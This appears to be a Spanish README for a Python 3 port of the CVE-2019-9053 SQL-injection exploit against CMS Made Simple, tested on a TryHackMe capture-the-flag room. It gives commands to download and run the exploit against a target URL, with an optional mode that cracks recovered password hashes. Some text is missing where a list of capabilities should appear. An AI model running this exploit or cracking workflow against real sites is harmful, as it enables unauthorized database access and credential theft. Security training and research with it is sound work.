
CVE-2019-9053.
Este es un port a Python 3 del exploit CVE-2019-9053, que afecta a versiones de CMS Made Simple (CMSMS) anteriores a la 2.2.10. La vulnerabilidad permite inyección SQL a través del módulo News.
Probado en el TryHackMe Simple CTF Challenge.

El exploit aprovecha una vulnerabilidad de inyección SQL en el módulo News de CMS Made Simple. Puede:
Descargue y ejecute rápidamente usando estos comandos:
# Download the exploit
curl -O https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/exploit.py
# Download requirements
curl -O https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/requirements.txt
# Install requirements
pip install -r requirements.txt
# Make exploit executable
chmod +x exploit.py
# Run the exploit
./exploit.py -u http://target.com/cms
Alternativa usando wget:
wget https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/exploit.py
wget https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/requirements.txt
pip install -r requirements.txt
chmod +x exploit.py
./exploit.py -u http://target.com/cms
git clone https://github.com/del0x3/CVE-2019-9053-port-py3.git
cd CVE-2019-9053-port-py3
pip install -r requirements.txt
Uso básico:
python3 exploit.py -u http://target.com/cms
Con descifrado de contraseñas:
python3 exploit.py -u http://target.com/cms -c -w /path/to/wordlist.txt
-u, --url: URL base del objetivo (obligatorio)-w, --wordlist: Ruta al archivo de palabras para el descifrado de contraseñas-c, --crack: Activar modo de descifrado de contraseñasEsta herramienta es solo para fines educativos y de investigación en seguridad. No la utilice contra sistemas sin permiso explícito.
Licencia MIT